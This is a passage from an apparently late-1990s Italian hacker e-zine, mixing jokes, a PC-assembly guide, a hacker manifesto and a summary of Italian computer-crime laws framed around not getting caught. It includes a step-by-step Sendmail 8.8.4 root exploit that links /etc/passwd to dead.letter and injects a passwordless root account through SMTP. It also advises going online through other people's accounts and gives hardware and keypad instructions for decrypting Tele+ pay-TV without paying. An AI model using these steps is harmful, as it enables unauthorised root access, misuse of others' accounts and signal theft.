pi— semplice. Mi scuso per aver insultato il gruppo "IL TIMONE" (tutti sanno che se uno cade dal seggiolone da piccolo difficilmente si riprender…) e spero che un giorno si accorgeranno che anche se fermano uno di noi, non possono fermarci tutti. Ma ora, prima della rubrica dedicata alla sessualit…, vediamo quali sono i libri della settimana (Piero Angela RULEZ!!! :)): -TCP/IP Illustrated (saga in 3 volumi di cui non ne ho letto manco uno) -TCP/IP for dummies (per chi non si vuole sorbire i 3 TCP/IP Illustrated ma che, come si deduce dal titolo di questo libro, Š uno stupido) -La mia lunga strada dall'inferno (The long hard road out of hell)... Ok, il libro di Marilyn Manson non c'entra n kakka, ma Š molto bello vedere come riceve le "ali"... -I 2 libri di Bill Gates©, perch‚ sar… anche scemo lo zio Bill ma Š fuRRRRBo -L'albero della vita per voi poveretti che ancora non sapete come nascono i bambini -Mein Kampfh (si scrive cos•?) di Adolf Hitler per vedere che era davvero un pazzo -Tutti i libri di Stephen king che Š un MITOOOOOO! -I libretti dei CD dei Marilyn Manson (ce li avete, vero??? ;)) Alla prossima! Mr_Skull Falsit… Falsit… Realt… falsificate Tutte in fila come spugne in attesa di assorbire le realt… terziarie della vita -Brian Warner ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ for the great members of @-,”i''i'”,.,”i''i'”,.,”i''i'”,.,”i''i'”,.,”i''i'”,-@ | _ _ ____ _ | | | \ | | _____ _| __ )(_) ___ ___ | -+- | \| |/ _ \ \ /\ / / _ \| |/ _ Y __|-+: | |\ | __/\ V V /| |_) | | __|__ \ : | |_| \_|\___| \_/\_/ |____/|_|\___|___/ | @-,”i''i'”,.,”i''i'”,.,”i''i'”,.,”i''i'”,.,”i''i'”,-@ Allora, escludendo tutte le possibili ammirazioni che potrei fare sulla vostra e-zine (n.r. uaaa maro' stu' zine e' propeto ruoss', con noto accento meridionale..) passiamo alle cose serie. vorrei iniziare a far parte del vostro gruppo :) Cero, si, si lo so che inquesto preciso momento dite "ma chi lo conosce a questo, quasi quasi ci spediamo un pacco bomba a casa e la facciamo finita". purtroppo per voi la cosa non e' cosi' semplice per due semplici motivi : 1) non sapete dove abito e 2) mi sono dimenticato di dirvi che sono superman (no, forse superman no) sono l'incredibile hulk (forse con la pancetta ci sono :) forse potrei essere Mac Gyver.. si', ho deciso, sono proprio lui. Sigla : papapa parapa paap parpapapra (mi pare faccia proprio cosi') Allora precisando due cose : 1) non e' che mi possa definire un vero hacker, ne' un craker, ne' un programmatore, ne' un phreaker, ne' un essere mitologico. Vabbe' allora che scrivi a fare, mi direte voi .. sono semplicemente un newbies :) non ho mai bucato il pentagono, ne' il norad, ne' il sito di mtv, comunque potrei avere le conoscenze per bucarli (almeno quello di mtv). Sto' pian piano assimilando le tecniche di hacking e di phreaking come Luke Skywalker quelle della forza jedi. Per quel che riguarda la programmazione, purtroppo, so solo il fortran, e forse l'anno prox parto con il matlab. non so a chi possa servire ma comunque... 2) potrei scrivere di cazzate e non (droga, alcool, anarky, bombe) il tutto mischiato a quello che so di hack e varie. fatemi sapere la mia e-mail is : [email protected] Per ora vedete se questo vi piace : | |.| |.| |\./| |\./| . |\./| . \^.\ |\\.//| /.^/ \--.|\ |\\.//| /|.--/ \--.| \ |\\.//| / |.--/ \--.|\ |\./| /|.--/ \--.|\ |\./| /|.--/ \ .\ |.| /. / _ -_^_^_^_- \ \\ // / -_^_^_^_- _ - -/_/_/- ^ ^ | ^ ^ -\_\_\- ////////////////////////////////S_A_S_H_A\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ ||||||||||||||||||||||||||||||||S_A_S_H_A||||||||||||||||||||||||||||||||||||||| \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\S_A_S_H_A/////////////////////////////////////// Beh, di solito questi articoli iniziano con cose del tipo "sono stato contattato da ***** che ha contattato ***** e che mi ha chiamato. grazie ***** Io invece dovro' iniziare cosi' : nessuno mi ha contattato, nessuno ha contattato un'altro che poi mi ha contattato. sono (forse) su questa e-zine perche' ho scritto io. Grazie a me :) Salve sono Troy Mclure vi ricorderete di me in azioni hacker come "hackerando sotto la pioggia" oppure "hackerate il computer del soldato Ryan". Oggi parliamo dalle leggi italiane che ci interessano da vicino. Premetto che non studio giurisprudenza ma chimica :) Purtroppo ci sono delle cose che si devono sapere. Proprio come le leggi italiane. Hacker novelli come me sono presi da film hackers o wargames sanno che in america ad essere un hacker potresi quasi finire sulla sedia elettrica. Qui le cose sono un po diverse : anche perche' l'italia non ha tutte le risorse dell'america : avete mai visto voi una scuola collegata in rete, dove potete cambiare l'allarme antincendio? (hackers) oppure sapete dove cambiare il timer dei semafori? (sempre hackers). Comunque non e' che qui ci vadano molto piu' piano con le condanne. Per prima cosa una importantissimissimissima : PER IL CODICE CIVILE VIENI CONDANNATO PER QUALSIASI COSA CHE FAI :( PER IL CODICE PENALE SE COMMETTI UN CRIMINE CHE NON HA UNA LEGGE PENALE, NON TI POSSONO CONDANNARE :) Cio' implica che prima di fare qualsiasi cosa vedete se c'e' la legge apposita, se c'e' fatelo senza farvi beccare, se non ci dovesse essere la legge.... chiamatemi, verro a farlo con voi(qualsiasi cosa dovrete fare :) Vediamo le leggi : c.p legge 420 l'arresto in fragranza e' obbligatorio (se non vi colgono sul fatto potete sempre fare finta di niente.) il fermo e' cosentito la competenza e' del tribunale si procede d'ufficio Attentato a impianti di pubblica utilita'. Chiunque commette un fatto diretto a danneggiare o distruggere impianti di pubblica utilita', e' punito, salvo che il fatto costituisca piu' grave reato, con la reclusine da uno a quattro anni. La pena si applica anche a chi commette un fatto diretto a danneggiare o distruggere un sistema informatico o telematico di pubblica utilita', ovvero dati, informazioni o programmi in esso contenuti o ad essi pertinenti. P.S = potete anche svotargli il cestino per fargli un favore e vi beccate la gabbia ----------------------------------------------------------------------------c.p 615 l'arresto in fragranza e' facoltativo il fermo non e' consentito (potete anche emigrare alle haway) la competenza e' del pretore si procede con querela e poi d'ufficio Accesso abusivo ad un sistema informatico o telematico. chiunque abusivamente si introduce in un sistema informatico o telematico protetto da misure di sicurezza, ovvero vi si mantiene contro la volonta' espressa o tacita di chi ha il diritto di escluderlo, e' punito con la reclusione fino a tre anni. la pena della reclusione e' da uno a cinque anni : 1)se il fatto e' commesso da un pubblico ufficiale o da un incaricato di un pubblico servizio, con abuso di poteri o con violazione dei doveri inerenti alla funzione o al servizio , o da chi esercita anche abusivamente la professione di investigatore privato, o con l'abuso della qualita' di operatore di sistema; 2)se il colpevole per commettere il fatto usa violenza sulle cose o alle persone; 3)se dal fatto deriva la distruzione o il danneggiamento del sistema o l'interruzione totale o parziale del suo funzionamento; Qualora i fatti riguardino sistemi informatici o telematici di interesse militare o relativi all'ordine pubblico o alla sanita' o alla protezione civile la pena e' da tre a otto anni. ----------------------------------------------------------------------------c.p 615-4 Detenzione e diffusione abusiva di codici di accesso a sistemi informatici o telematici. Chiunque al fine di procurare a se' o ad altri un profitto o di arrecare ad altri un danno, abusivamente si procura, riproduce, diffonde, comunica o consegna codici, parole chiave o altri mezzi idonei all'accesso ad un sistema informatico o telematico protetto da misure di sicurezza, o comunque fornisce indicazioni o istruzioni idonee al predetto scopo, e' punito con la reclusione sino a un anno e con una multa sino a lire dieci milioni. ----------------------------------------------------------------------------c.p 615-6 Diffusione di programmi diretti a danneggiare o interrompere un sistema informatico. Chiunque diffonde, comunica o consegna un programma informatico da lui stesso o da altri redatto, avente per scopo o per effetto il danneggiamento di un sistema informatico o telematico, dei dati o dei programmi in esso contenuti o ad esso pertinenti e' punito con la reclusione sino a due anni e con una multa sino a lire venti milioni. ----------------------------------------------------------------------------c.p 617-4 Intercettazione, impedimento o interruzione illecitadi comunicazioni informatiche o telematiche Chiunque fraudolentemente intercetta comunicazioni relative a un sistema informatico o telematico o intercorrenti tra piu' sistemi, ovvero le impedisce o le interrompe, e' punito con la reclusioneda sei mesi a quattro anni. ----------------------------------------------------------------------------Beh, queste sicuramente non sono tutte ma sono quelle che io ho ritenuto piu' importanti. A vederci ad una prossima volta, newbies favorevoli. Mi potete trovare su #ahccc Mi potete scrivere a [email protected] S_A_S_H_A ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ GUIDA ALL' ASSEMBLAGGIO DI UN COMPUTER DALLA A ALLA Z ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ DISKLAIMER:io Devil_666 non mi prendo nessuna responsabilita' per eventuali danni che potreste causare al vostro pc seguendo cio' che viene detto in questa guida....insomma + o - e' kosi' no ??!! 1a PUNTATA: Montaggio di RAM & PERIFERICHE Che dite ??!! No non vi ho preso per deficenti :) lo so benissimo che ram e schede varie ve le sapete montare anke da soli......ma sapete kom e'... bisogna iniziare da qualcosa di facile ;D <><>RAM<><> Allora, il primo problema per la ram e' l'acquisto: infatti esistono molti tipi di ram ed ovviamente ce n'e' solo un tipo che funzia sul nostro picci', quindi vediamo un po' che ka>>o di ram dobbiamo rubare...ehm.....volvevo dire komprare per la nostra macchina. La prima distinizione e' fra SIMM e DIMM...le prime sono quelle un po' + vecchie ormai poko prodotte ma ugualmente usate sui picci' un po' + vecchi, mentre le seconde sono usate a partire generalmente da pentium 200... Kome riconoscerle??? E'facile...le simm sono + corte ed hanno solo 72 pin (contatti va meglio ?? ;D) mentre le dimm sono + lunghe ed hanno 168 pin. Aprendo il picci' le potete rikonoscere xche' le simm hanno i morsetti che le tengono il ferro, memtre le dimm in plastika. Questa era la prima distinzio ne...poi all'interno delle dimm c'e' da distinguere fra ram a 100 mhz e dimm normali. Quelle a 100 mhz vengono usate su schede madri che hanno un clock di 100 o + mhz e sono le + veloci in assoluto le altre dimm servono x le altre motherboard. Se komprate dimm da 100 mhz e le montate su una scheda madre con clock inferiore ai 100 mhz tutto vi funzionera' ugualmente ma la spesa sara' + alta; questo puo' essere conveniente se avete in previsione di sostituire anke la scheda madre......cosi' quando lo farete avrete gia' le ram adatte al nuovo hadware (parolone eh?). Ora che vi ho spiegato un po' kome scegliere le ram adatte al vostro picci' vi diko kome montarle (lo so che e' una ka<<ata e riesce a tutti ma ve lo diko uguale :PPP). Allora, dopo che avete aperto il case, cerkati gli alloggiamenti per le ram... prendete un banco di ram che dovete montare e appoggiatene la base nell'apposita fessura tenendolo inclinato verso l'esterno......a questo punto non vi rimane che spingere il banko ram verso l'interno del picci' fino a che sentirete il click dei ganci che hanno blokkato la ram......o il click del gancio che si e' stronkato in 2 ;D......cmq non vi preoccupate, montare le ram e' un'operazione estermamente semplice che, anke se non avete mai fatto, sarete in grado di fare in poki minuti. Beh, x quanto riguarda le ram penso possa bastare no ??!! <><>PERIFERICHE VARIE<><> Il mantaggio di schede varie tipo audio video ecc.......e' ankora + facile di quello delle ram. L'unika cosa alla quale bisogna stare attenti e' all'acquisto di una scheda che il nostro picci' possa accettare (non vi sto a dire che ve ne fate di una scheda video agp 4x quando il vostro picci' e' un katamarano che ha x miracolo i supporti x le pci.........:D) cmq sikuramente lo sapevate gia'....=). Allora, una volta acquistata la scheda, non resta altro che rimuovere lo sportelletto in metallo dietro il picci' in korrispondenza dello slot nel quale si vuole montare la nostra scheda, inserire la scheda nello slot e fissarla kon la vitina apposita. Poi si puo' rikiudere il kase e dopo aver kollegato i kavi appositi alla nostra nuova periferica si possono installare i driver necessari al suo funzionamento ed il gioco e' fatto. Ca<<o com era difficile eh ??!! :PPP -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_ Vabbe' newbies per questa uscita e' tutto; sui prossimi numeri dovreste trovare montaggio di hard disk, elettori di cd-rom e floppy kome seconda puntata, per il finale mi sono lasciato il montaggio di schede madri e cpu.........Spero non mi passi la voglia di scrivere per questa stupenda rivista !!! Ho detto tutto mi pare........se avete bisogno di chiarimenti o volete darmi consigli, idee, farmi notare errori e dimenticanze scrivete pire a: [email protected] --> Devil_666 Consiglio: mentre qualunque domanda ed elogio e' ben accetto, per critiche ed offese usate un server smtp e non la vostra kasella e-mail altrimente verrete mailbombati pesantemente...;D...Eddai scherzo (forse). Si, ora che ho detto tutte le ka<<ate che avevo da dire non mi resta altro che salutarvi sperando che questo articolo sia di reale aiuto a qualche lettore. L'autore di questo art. Devil_666 vi saluta: (new)Byezzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz PS: un grande tnx agli autori du questa e-zine zcools e nobody88 per avermi concesso la possibilita' di scrivere per newbies........Spero che grazie ai vostri sforzi riuscirete a mandare avanti questo bel progetto. Byezzzz ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ MANIFESTO DI CARNIFEX ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ Ecco una lettera arrivatami da un newbies o hacker (non so) di nome Emanuele che alla sua mail ha allegato un manifesto recentissimo trovato in giro per la rete e subito sottopostoci per la visione e per la pubblicazione: ---<INIZIO E-MAIL>--Ciao nObody88, complimenti per la rivista. Sono un ragazzo al quale e' passato per le mani un articolo molto bello stile Manifesto hacker, che pero' denuncia anche i veri pirati informatici e mette in luce vari aspetti interessanti. E' un documento non molto lungo, quindi se ti piace potresti anche inserirlo nel tuo prossimo (speriamo che ce ne sia) numero di Newbies. Il nome di quello che l'ha scritto e' Carnifex, un nome che non ho mai sentito ne' letto in alcun posto, quindi dovrebbe essere uno nuovo. In allegato ti mando il file txt. Ciao, Emanuele ---<FINE E-MAIL>--PAURA ? Non aver paura degli hacker quando ti parlano di crimini informatici, ne' quando ti dicono che uno e' riuscito ad entrare nella tua banca, e solo per fortuna non ha scombinato anche il tuo conto; non aver paura dell'hacker se temi il dilagare della pirateria informatica o se tremi al sol pensiero che uno di loro si e' preso gioco della N.A.S.A. rubando un satellite con il computer. Non aver paura di loro come hacker perche' loro, in realta', hacker non sono. C'e' forse un po' di ignoranza nella gente, e forse e' un ignoranza indotta, da coloro che nell'hacker vedono un pericolo, un nemico, un avanzo di galera. Indotta forse da chi non riesce a prendersela che con gli hacker, ma loro, vedete, non sono cosi'. Quelli che chiamate genericamente hacker sono individui di diverse categorie, che hanno a che fare con gli hacker solo per le conoscenze che hanno, poi ognuno le mette in pratica come vuole: gli hacker entrando nei sistemi informatici al solo scopo di capire come funzionano, e i cracker, i pirati informatici, i lamer entrando nei sistemi informatici al solo scopo di distruggerli o trarne vantaggi personali. Qui e' la differenza. E non continuate a trattare gli hacker come criminali, e non continuate ad aver paura di loro, e non chiamate la polizia se un giorno un tizio bussa alla vostra porta e dice: - Sono un hacker. (Mi rimangio l'ultima frase: un hacker non lo direbbe mai, se non altro perche' un hacker non ammetterebbe di essere un hacker solo per vantarsi o per far vedere che e' qualcuno) Che dici? Ancora paura? Paura, ma non piu' degli hacker. Lo scenario e' lo stesso: gli hacker si sono salvati il culo, ora la colpa di tutto ricadra' sui pirati informatici, loro ormai sono puliti...ma cosa cambia in realta'? Dopo tutto questo ambarada'n, a che conclusione si e' giunti? Per il pover'uomo di provincia, per la massaia, per il direttore di banca, per il ragazzo che bestemmia perche' il prezzo dei CD e' troppo alto, tutto e' come prima, cambiera' solo il nome contro cui inveiranno all'unisono: non ci sara' piu' un bastardo hacker, ma invece un bastardo fuorilegge telematico. Per tutta questa gente il problema resta...che si puo' fare, allora? Come si puo' ovviare a tutto cio'? Esiste un modo...un modo che eliminerebbe i pregiudizi sugli hacker e falcerebbe la strada ai pirati. Infatti le sole persone che riuscirebbero a colpire al cuore tutti i malviventi nella Rete sarebbero chi conosce la loro vita, chi conosce i loro punti di forza e i loro punti deboli, chi sa che cosa fare e quando farla. Chi come loro sa ma a differenza di loro non fa. E chi, se non gli hacker? Essi, in nome di una dignita' che e' stata loro tolta, dovrebbero unirsi per fare a pezzi tutti coloro che con l'illegalita' sulla Rete ci vivono, coloro che rovinano il duro lavoro altrui. Perche' non farlo? I problemi sarebbero presto risolti, e vero e' che alcuni gruppi di hacker si stanno gia' battendo per far diventare Internet un "posto" piu' sicuro, piu' piacevole e adatto a tutti, disgregando ad esempio le associazioni di pedofili. E tu, banchiere, la cui vita dipende dall'integrita' di alcuni computer, hai ancora paura degli hacker? (by Carnifex-giugno 1999) ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ RENDIAMOCI ANONIMI ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ Anonimita' un Sacro diritto di ogni persona cerca un poko di privacy per fare gli affari suoi nella rete. Io credo che l'anonimita' tolale nella rete non esista ... kome e'successo anke ai migliori competenti sysadmin , associazioni e corporazioni hanno saputo rintracciare anke il log piu' remoto.... Cmq cerchiamo di nasconderci un poko nella rete cosi' per avere la nostra privacy.. Allora idee che mi sono venute in mente [o meglio una struttura alquanto sicura per nascondersi] chiamiamo il nostro caro provider con account di altri ovviamente e colleghiamoci poi entriamo nella nostra shell preferita e da essa colleghiamoci col caro comando dial alla notra bbs preferica collegata alla rete ora siamo un poko + anonimi e ci sentiamo molto meglio hehehe. idee sono ben accette su ste 4 cose che detto ZeroCool ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ IL MIO EXPLOIT PREFERITO... SM 8.8.4 !!! ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ Va beeeeeneeeee...allora le dediche e le contro dediche...come sempre.... Thi$ 4rT is DeD 2 : lo spagnolo che sulla spiaggia mi ha kiesto di fargli una foto !!! P.S. Anche alla figlia dello spagnolo....a cui avrei volentieri fatto qualkosa che la sua nazionalita' suggerisce...vabbe' Thi5 aRt is Vs-d3d To : Dante Alighieri che come lo stronzo al suo "grazias" ha risposto con un "prego" invece del suo solito "de nada" Bhe..ora vi parlo del mio exploit preferiiiiiitoooooo...troppo BeLLo !!!!!! Beh..penso sappiate tutti qual'e' il + bacato dei programmi.. se non lo sapete questo bellissimo programmino e' il SendMail..programma di posta elettronica tra i + usati. Bene in questo articolo vi parlero' dell'exploit per guadagnare privilegi da root su di un sistema avente caricato questo programma nella sua versione 8.8.4 dehihohuuuu...miticooooo!!! Per usufruire dell'exploit avrete bisogno di avere gia' un altro account...se no vi sparate le pippette...sigh. Allora avete l'account...e telnettandovi al server sulla porta 25 scoprite che il suo sendmail e' nella versione 8.8.4...benissimo... siete a CavaLLuccio marino !!! cosa fare ora ??? Entrate nel server telnettandovi col vostro account, e date il comando ln /etc/passwd /var/tmp/dead.letter a cosa serve ???...boh?!?!...scherzo...ora ve lo spiego... avete semplicemente linkato il file dove vanno a finire le lettere perse al file di pass....a cosa ci e' servito ??? Bene...quello che vi sara' scritto in ogni e-mail andata persa verra' trascritto nel file passwd. A che pippozza mi serve ???..ora ve lo spiego...aspettate e vedrete!!! telnettatevi sulla 25 ed impartite i seguenti comandi: mail from: [email protected] rcpt to: [email protected] data homer::0:0:ihih ohoh:/root:/bin/bash . quit Avrete cercato di mandare una lettera ad una casella che si chiama [email protected] non esiste!!!! Allora il sistema che fa ??? prende il contenuto dell'e-mail (homer::0:0:ihih ohoh:/root:/bin/bash) e la aggiunge al passwd...vi sarete cosi' creati un account da root con login homer e senza alcuna pass. + facile di cosi' si muore !!!! Ciao BeLLi....e alla prossiminaaaaaaa !!! Ciaoooooooooo bye bye Dante Alighieri...NeWBiEs StaFf... 08V|0U5 : 54|NT 59|R|T5 !!!! ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ TELEPIU' TERRESTRE: INFO VARIE ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ CONSUMO: un sorso di Johnny Walker e un decoder t+ stravolto dai miei inutili sperimenti MUSICA ASCOLTATA: Sigle dei cartoni animati rifatte da "Gli amici di Roland" in versione Rockeggiante Allora oggi mi sono alzato di buon umore, anche se fa un caldo boia e sto schiattando dell'afa. Ho deciso di scrivere questo articolo per mettere in chiaro quattro cosette riguardo le radio-televisioni private codificate in particolare di t+. Inizio col dire che non so se le cose che mi appresto a scrivere siano legali o meno ma non penso che faccia molta differenza. L'emittente telepiu' trasmette sia via satellite sia tramite il classico decoder terrestre. In questo articolo approfondiro' le tecniche di decriptaggio tramite decoder terrestre. Pronti . .. . via! T+ trasmette il proprio segnale (Audio e Video) tramite un sistema di crittografia IRDETO che e' l'azienda che ha elaborato e introdotto i decoders Comcrypt e Cablecrypt. Tutte le info che troverete in questo articolo funziona non solo con t+ ma anche con le altre emittenti (straniere) che utilizzano la stessa tecnologia. Questo sistema di codifica di immagini e suoni nasce in due momenti separati: per quanto riguarda l'audio il sistema di crittografia nasce nei primi anni 80 quando ancora non si utilizzava la crittografia per la televisione e contemporaneamente alla nascita di Videocrypt e Eurocrypt. Ma come funziona l'algoritmo di codifica Audio Video?? La questione, dal punto di vista teorico, non e' per niente difficile. Innanzitutto una premessa rapida: la Tv di casa nostra, per ricevere e visualizzare correttamente i segnali trasmessi hanno bisogno di essere sincronizzati. Senza una sincronizzazione verticale e orizzontale i singoli punti del fotogramma non troverebbero una posizione precisa e l'immagine risulterebbe in continuo movimento per lo schermo. Una delle cose che fa l'encoder (Non il decoder) e' questa: distorcere l'immagine. Altra cosa che fa l'encoder e' quella di cambiare polarita' dell'immagine in ordine pressoche' casuale (il colore bianco diventa nero e cosi' via . . .). La funzione del decoder e' appunto sapere come le immagini sono distorte e polarizzate in modo da saperle ricostruire rapidamente. Come dicevo prima questo sistema di criptaggio del segnale video e' abbastanza vecchiotto ma ancora largamente utilizzato. Tuttavia questo metodo e' totalmente insicuro e cosi' decriptare il segnale video e' molto semplice. (non correte bei fiuliti . . continuate a leggere . . ahahaeheheha) Per quanto riguarda l'audio il discorso e' completamente diverso. Per le mie conoscenze poco tecniche posso sicuramente dirvi che non esiste alcun modo per ricevere l'audio modificando il proprio decoder terrestre. Si' puo' utilizzare una scheda Tv conessa al picci' ma non conosco metodi di modifica dei decoders. Per quanto riguarda le informazioni tecniche su tutti i tipi di decoders e sugli algoritmi di criptaggio audio video vi rimando al sito Republic che purtroppo non trovo piu' (cercate "Republic cablecrypt " e troverete cio' che cercate. In questo sito c'e' una bellissima guida tecnica (arrivata alla seconda edizione) che tratta in modo quasi scientifico la tecnologia Irdeto. E ORA . . . . . rulli di tamburo. . . .. . . . . . . piu' forte . . . . . . .. . . .. . . .un po' meno . . . . . . . . OK! Come decriptare TeLePIU' - - - - due metodi facili facili - - - Questi metodi sono tutti seri. Non sono semplci voci di corridio. Sta roba funziona. ATTENZIONE: esistono sicuramente metodi piu' scientifici per decriptare telepiu' terrestre. Un anno fa circa ho conosciuto un tipo che per L. 250.000 mi vendeva un kit (che ho visto funzionare) che permetteva di decriptare telepiu'. Visto che i componenti erano abbastanza economici e il lavoro era fattibilissimo ho deciso di cercare ancora per Internet questi benedetti schemi ma non li ho mai trovati. ( Chiunque voglia mettersi in contatto con me: [email protected] in chat su #hackernow o #linux) METODO 1) Questo metodo e' l'unico che io conosca che permette di vedere e sentire tele+. Funziona solo su modelli ComCrypt 4000 prima serie cioe' comprati fra il dicembre '95 e il luglio '96. Molti di questi decoders sono poi stati ritirati e revisionati . . . . (porca tr**a!) Ecco la procedura: - sintonizzate sul 1mo canale la frequenza di Telepiu' (se il decoder non e' attivo apparira' E3o E0 ) - scollegate l'antenna - premete il tasto - per tornare indietro con i canali ( apparira' la scritta rr) - ricollegate l'antenna - godetevi il film o la partita Per cambiare da +1 a +2 va eseguita la stessa procedura" Questo funziona solo con alcuni decoder siglati ComCrypt 4000. Non pensate di comprare un decoder apposta per provare: moltissimi decoder sono stati ritirati e riprogrammati per correggere 'sto bug (ovviamente il mio e' uno di quelli che non funziona). Almeno dieci persone mi hanno detto pero' che funzioni (sul decoder giusto). Se avete un decoder in cantina a prendere polvere potete sempre provare! METODO 2) Questo metodo consiste nel fottere il segnale video criptato. Conosco la procedura solo per i decoders CableCrypt. Non e' applicabile (almeno: io non ci sono riuscito) sui decoder Comcrypt 4000 (sara' per "par condicio"????) Ecco come fare: 1. Smontate il decoder fino a quando riuscite ad estrarre il circuito stampato del decoder. Ora localizzate sul decoder un integrato grosso siglato delta 5.x (o comunque l'unico integrato a 40 pin presente nel circuito) Dalla parte delle saldature vi troverete qualcosa del genere: 40 21 --------------------------] | --------------------------1 20 - Localizza il pin 18 dell'integrato IC503 (o simile) e gratta via con un taglierino o un coltello il rame della pista da entrambe le parti. - Localizza il pin 23 dell'integrato IC503 (o simile) e gratta via il rame sulla sinistra (questo dalla parte del microcontroller: insomma . . . rigirate il tutto) - Localizza il pin 32 e 33 e gratta via il rame da entrambi i lati. - Localizza il pin 23 (si' quello di prima) e saldaci un filo, poi collegalo al ground (puoi usare lo spazio vuoto del J835, guarda il lato componenti). (traduzione del testo di Peter "The Video Ripper" disponibile sul sito di Republic) Non vorrei aver sbagliato . . . ca**o! Be' ecco la versione in lingua . . - Be sure that all the metal tops are removed from the processor-box. - Locate pin 18 of IC503 and scratch away the copper on both sides. - Locate pin 23 of IC503 and scratch away the copper on 